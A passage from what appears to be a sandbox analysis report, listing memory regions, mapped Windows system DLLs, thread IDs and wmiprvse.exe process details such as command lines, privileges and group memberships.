"c:\\windows\\system32\\netapi32.dll") Region: id = 1231 start_va = 0x7ffb253c0000 end_va = 0x7ffb25586fff monitored = 0 entry_point = 0x7ffb2541db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1232 start_va = 0x7ffb25640000 end_va = 0x7ffb256a9fff monitored = 0 entry_point = 0x7ffb25676d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1233 start_va = 0x7ffb256b0000 end_va = 0x7ffb25764fff monitored = 0 entry_point = 0x7ffb256f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1234 start_va = 0x7ffb25770000 end_va = 0x7ffb257f5fff monitored = 0 entry_point = 0x7ffb2577d8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1235 start_va = 0x7ffb25800000 end_va = 0x7ffb25842fff monitored = 0 entry_point = 0x7ffb25814b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1236 start_va = 0x7ffb25850000 end_va = 0x7ffb25e93fff monitored = 0 entry_point = 0x7ffb25a164b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1237 start_va = 0x7ffb25ea0000 end_va = 0x7ffb25ef4fff monitored = 0 entry_point = 0x7ffb25eb7970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1238 start_va = 0x7ffb25f00000 end_va = 0x7ffb26085fff monitored = 0 entry_point = 0x7ffb25f4ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1239 start_va = 0x7ffb26090000 end_va = 0x7ffb261e5fff monitored = 0 entry_point = 0x7ffb2609a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1240 start_va = 0x7ffb26230000 end_va = 0x7ffb262dcfff monitored = 0 entry_point = 0x7ffb262481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1241 start_va = 0x7ffb262e0000 end_va = 0x7ffb26331fff monitored = 0 entry_point = 0x7ffb262ef530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1242 start_va = 0x7ffb264f0000 end_va = 0x7ffb2658cfff monitored = 0 entry_point = 0x7ffb264f78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1243 start_va = 0x7ffb26590000 end_va = 0x7ffb266abfff monitored = 0 entry_point = 0x7ffb265d02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1244 start_va = 0x7ffb266b0000 end_va = 0x7ffb26756fff monitored = 0 entry_point = 0x7ffb266bb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1245 start_va = 0x7ffb26780000 end_va = 0x7ffb267dbfff monitored = 0 entry_point = 0x7ffb2679b720 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1246 start_va = 0x7ffb267e0000 end_va = 0x7ffb27d3efff monitored = 0 entry_point = 0x7ffb269411f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1247 start_va = 0x7ffb27d40000 end_va = 0x7ffb27d9afff monitored = 0 entry_point = 0x7ffb27d538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1248 start_va = 0x7ffb27e00000 end_va = 0x7ffb2807cfff monitored = 0 entry_point = 0x7ffb27ed4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1249 start_va = 0x7ffb281e0000 end_va = 0x7ffb28322fff monitored = 0 entry_point = 0x7ffb28208210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1250 start_va = 0x7ffb28450000 end_va = 0x7ffb284bafff monitored = 0 entry_point = 0x7ffb284690c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1251 start_va = 0x7ffb284c0000 end_va = 0x7ffb288e8fff monitored = 0 entry_point = 0x7ffb284e8740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1252 start_va = 0x7ffb288f0000 end_va = 0x7ffb289b0fff monitored = 0 entry_point = 0x7ffb28910da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1253 start_va = 0x7ffb28a40000 end_va = 0x7ffb28a47fff monitored = 0 entry_point = 0x7ffb28a41ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1254 start_va = 0x7ffb28a50000 end_va = 0x7ffb28af6fff monitored = 0 entry_point = 0x7ffb28a658d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1255 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1258 start_va = 0x5d80000 end_va = 0x5e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d80000" filename = "" Region: id = 1259 start_va = 0x6280000 end_va = 0x637ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006280000" filename = "" Region: id = 1260 start_va = 0x6a00000 end_va = 0x6afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a00000" filename = "" Region: id = 1261 start_va = 0x6d00000 end_va = 0x6dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006d00000" filename = "" Region: id = 1515 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 1670 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 1696 start_va = 0x790000 end_va = 0x7b0fff monitored = 0 entry_point = 0x792300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 1697 start_va = 0x1780000 end_va = 0x17cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001780000" filename = "" Region: id = 1698 start_va = 0x790000 end_va = 0x7b0fff monitored = 0 entry_point = 0x792300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 1699 start_va = 0x790000 end_va = 0x7b0fff monitored = 0 entry_point = 0x792300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 1729 start_va = 0x690000 end_va = 0x691fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 1730 start_va = 0x6e00000 end_va = 0x6efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006e00000" filename = "" Region: id = 1731 start_va = 0x74b0000 end_va = 0x75affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000074b0000" filename = "" Region: id = 1861 start_va = 0x7c00000 end_va = 0x7cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c00000" filename = "" Region: id = 1865 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Thread: id = 23 os_tid = 0xec Thread: id = 24 os_tid = 0x690 Thread: id = 25 os_tid = 0x7a4 Thread: id = 26 os_tid = 0x2d8 Thread: id = 27 os_tid = 0xccc Thread: id = 28 os_tid = 0x368 Thread: id = 29 os_tid = 0x718 Thread: id = 30 os_tid = 0xc0c Thread: id = 31 os_tid = 0xbd8 Thread: id = 32 os_tid = 0x414 Thread: id = 33 os_tid = 0x518 Thread: id = 34 os_tid = 0xb9c Thread: id = 35 os_tid = 0xb4c Thread: id = 36 os_tid = 0x670 Thread: id = 37 os_tid = 0xfdc Thread: id = 38 os_tid = 0xfcc Thread: id = 39 os_tid = 0xfc4 Thread: id = 40 os_tid = 0xfb0 Thread: id = 41 os_tid = 0xf94 Thread: id = 42 os_tid = 0xf88 Thread: id = 43 os_tid = 0xf6c Thread: id = 44 os_tid = 0xeec Thread: id = 45 os_tid = 0xee0 Thread: id = 46 os_tid = 0xedc Thread: id = 47 os_tid = 0xed8 Thread: id = 48 os_tid = 0xec4 Thread: id = 49 os_tid = 0xeb0 Thread: id = 50 os_tid = 0xeac Thread: id = 51 os_tid = 0xea4 Thread: id = 52 os_tid = 0xe78 Thread: id = 53 os_tid = 0xe0c Thread: id = 54 os_tid = 0xdc0 Thread: id = 55 os_tid = 0xd68 Thread: id = 56 os_tid = 0xb04 Thread: id = 57 os_tid = 0xac4 Thread: id = 58 os_tid = 0xb48 Thread: id = 59 os_tid = 0xb44 Thread: id = 60 os_tid = 0xb40 Thread: id = 61 os_tid = 0xaec Thread: id = 62 os_tid = 0xae4 Thread: id = 63 os_tid = 0xae0 Thread: id = 64 os_tid = 0xaa8 Thread: id = 65 os_tid = 0xa54 Thread: id = 66 os_tid = 0xa40 Thread: id = 67 os_tid = 0xa28 Thread: id = 68 os_tid = 0xa0c Thread: id = 69 os_tid = 0xa08 Thread: id = 70 os_tid = 0x9ec Thread: id = 71 os_tid = 0x9e4 Thread: id = 72 os_tid = 0x9e0 Thread: id = 73 os_tid = 0x9d8 Thread: id = 74 os_tid = 0x9d4 Thread: id = 75 os_tid = 0x950 Thread: id = 76 os_tid = 0x93c Thread: id = 77 os_tid = 0x91c Thread: id = 78 os_tid = 0x830 Thread: id = 79 os_tid = 0x4e0 Thread: id = 80 os_tid = 0x520 Thread: id = 81 os_tid = 0x48c Thread: id = 82 os_tid = 0x658 Thread: id = 83 os_tid = 0x630 Thread: id = 84 os_tid = 0x4a8 Thread: id = 85 os_tid = 0x49c Thread: id = 86 os_tid = 0x44c Thread: id = 87 os_tid = 0x434 Thread: id = 88 os_tid = 0x408 Thread: id = 89 os_tid = 0x404 Thread: id = 90 os_tid = 0x2b0 Thread: id = 91 os_tid = 0x294 Thread: id = 92 os_tid = 0x168 Thread: id = 93 os_tid = 0x170 Thread: id = 94 os_tid = 0x288 Thread: id = 95 os_tid = 0x284 Thread: id = 96 os_tid = 0x264 Thread: id = 97 os_tid = 0x274 Thread: id = 98 os_tid = 0x15c Thread: id = 99 os_tid = 0xf4 Thread: id = 117 os_tid = 0xbb8 Thread: id = 118 os_tid = 0xd3c Thread: id = 119 os_tid = 0x1030 Thread: id = 120 os_tid = 0x1034 Thread: id = 139 os_tid = 0x1244 Thread: id = 140 os_tid = 0x1248 Thread: id = 148 os_tid = 0x1288 Process: id = "7" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x61376000" os_pid = "0x720" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "6" os_parent_pid = "0x278" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xe], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xe], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xe], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cdd2" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1571 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1572 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1573 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1574 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1575 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1576 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1577 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1578 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1579 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1580 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1581 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1582 start_va = 0x1f0000 end_va = 0x1f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1583 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1584 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1585 start_va = 0x410000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 1586 start_va = 0x590000 end_va = 0x594fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 1587 start_va = 0x5a0000 end_va = 0x5a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1588 start_va = 0x5b0000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1589 start_va = 0x630000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1590 start_va = 0x640000 end_va = 0x976fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1591 start_va = 0x980000 end_va = 0xb07fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 1592 start_va = 0xb10000 end_va = 0xc90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b10000" filename = "" Region: id = 1593 start_va = 0xca0000 end_va = 0xd5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ca0000" filename = "" Region: id = 1594 start_va = 0xd60000 end_va = 0xe5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 1595 start_va = 0xe60000 end_va = 0xe60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e60000" filename = "" Region: id = 1596 start_va = 0xe70000 end_va = 0xe70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e70000" filename = "" Region: id = 1597 start_va = 0xe80000 end_va = 0xefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 1598 start_va = 0xf00000 end_va = 0xf7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 1599 start_va = 0xf80000 end_va = 0xffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f80000" filename = "" Region: id = 1600 start_va = 0x1000000 end_va = 0x107ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 1601 start_va = 0x1080000 end_va = 0x10fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 1602 start_va = 0x1100000 end_va = 0x117ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 1603 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1604 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1605 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1606 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1607 start_va = 0x7ff7ef980000 end_va = 0x7ff7ef9fffff monitored = 0 entry_point = 0x7ff7ef995f50 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 1608 start_va = 0x7ffb0a540000 end_va = 0x7ffb0a58cfff monitored = 0 entry_point = 0x7ffb0a54b470 region_type = mapped_file name = "pdh.dll" filename = "\\Windows\\System32\\pdh.dll" (normalized: "c:\\windows\\system32\\pdh.dll") Region: id = 1609 start_va = 0x7ffb0a6d0000 end_va = 0x7ffb0a6f4fff monitored = 0 entry_point = 0x7ffb0a6e5dc0 region_type = mapped_file name = "wmiperfclass.dll" filename = "\\Windows\\System32\\wbem\\WmiPerfClass.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiperfclass.dll") Region: id = 1610 start_va = 0x7ffb0e710000 end_va = 0x7ffb0e74cfff monitored = 0 entry_point = 0x7ffb0e71b760 region_type = mapped_file name = "wmiprov.dll" filename = "\\Windows\\System32\\wbem\\wmiprov.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprov.dll") Region: id = 1611 start_va = 0x7ffb10f40000 end_va = 0x7ffb10f55fff monitored = 0 entry_point = 0x7ffb10f455e0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 1612 start_va = 0x7ffb110b0000 end_va = 0x7ffb110d4fff monitored = 0 entry_point = 0x7ffb110b9900 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1613 start_va = 0x7ffb110e0000 end_va = 0x7ffb110f3fff monitored = 0 entry_point = 0x7ffb110e1800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1614 start_va = 0x7ffb11100000 end_va = 0x7ffb111f5fff monitored = 0 entry_point = 0x7ffb11139590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1615 start_va = 0x7ffb11680000 end_va = 0x7ffb11690fff monitored = 0 entry_point = 0x7ffb11682fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1616 start_va = 0x7ffb12f30000 end_va = 0x7ffb12faefff monitored = 0 entry_point = 0x7ffb12f47110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1617 start_va = 0x7ffb1e890000 end_va = 0x7ffb1e8a0fff monitored = 0 entry_point = 0x7ffb1e893320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 1618 start_va = 0x7ffb218f0000 end_va = 0x7ffb21953fff monitored = 0 entry_point = 0x7ffb21905ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1619 start_va = 0x7ffb24610000 end_va = 0x7ffb24640fff monitored = 0 entry_point = 0x7ffb24617d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1620 start_va = 0x7ffb24fb0000 end_va = 0x7ffb24fd8fff monitored = 0 entry_point = 0x7ffb24fc4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1621 start_va = 0x7ffb25120000 end_va = 0x7ffb2512efff monitored = 0 entry_point = 0x7ffb25123210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1622 start_va = 0x7ffb251b0000 end_va = 0x7ffb25397fff monitored = 0 entry_point = 0x7ffb251dba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1623 start_va = 0x7ffb25640000 end_va = 0x7ffb256a9fff monitored = 0 entry_point = 0x7ffb25676d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1624 start_va = 0x7ffb25f00000 end_va = 0x7ffb26085fff monitored = 0 entry_point = 0x7ffb25f4ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1625 start_va = 0x7ffb26090000 end_va = 0x7ffb261e5fff monitored = 0 entry_point = 0x7ffb2609a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1626 start_va = 0x7ffb26230000 end_va = 0x7ffb262dcfff monitored = 0 entry_point = 0x7ffb262481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1627 start_va = 0x7ffb264f0000 end_va = 0x7ffb2658cfff monitored = 0 entry_point = 0x7ffb264f78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1628 start_va = 0x7ffb26590000 end_va = 0x7ffb266abfff monitored = 0 entry_point = 0x7ffb265d02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1629 start_va = 0x7ffb266b0000 end_va = 0x7ffb26756fff monitored = 0 entry_point = 0x7ffb266bb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1630 start_va = 0x7ffb27d40000 end_va = 0x7ffb27d9afff monitored = 0 entry_point = 0x7ffb27d538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1631 start_va = 0x7ffb27e00000 end_va = 0x7ffb2807cfff monitored = 0 entry_point = 0x7ffb27ed4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1632 start_va = 0x7ffb28450000 end_va = 0x7ffb284bafff monitored = 0 entry_point = 0x7ffb284690c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1633 start_va = 0x7ffb288f0000 end_va = 0x7ffb289b0fff monitored = 0 entry_point = 0x7ffb28910da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1634 start_va = 0x7ffb28a50000 end_va = 0x7ffb28af6fff monitored = 0 entry_point = 0x7ffb28a658d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1635 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 100 os_tid = 0xc54 Thread: id = 101 os_tid = 0xc68 Thread: id = 102 os_tid = 0xc64 Thread: id = 103 os_tid = 0x6e8 Thread: id = 104 os_tid = 0x810 Thread: id = 105 os_tid = 0xb84 Thread: id = 106 os_tid = 0xa2c Thread: id = 107 os_tid = 0x734 Process: id = "8" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x3842000" os_pid = "0xc6c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "6" os_parent_pid = "0x278" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:00035854" [0xc000000f] Region: id = 1262 start_va = 0x10000 end_va = 0x1ffff monitored = 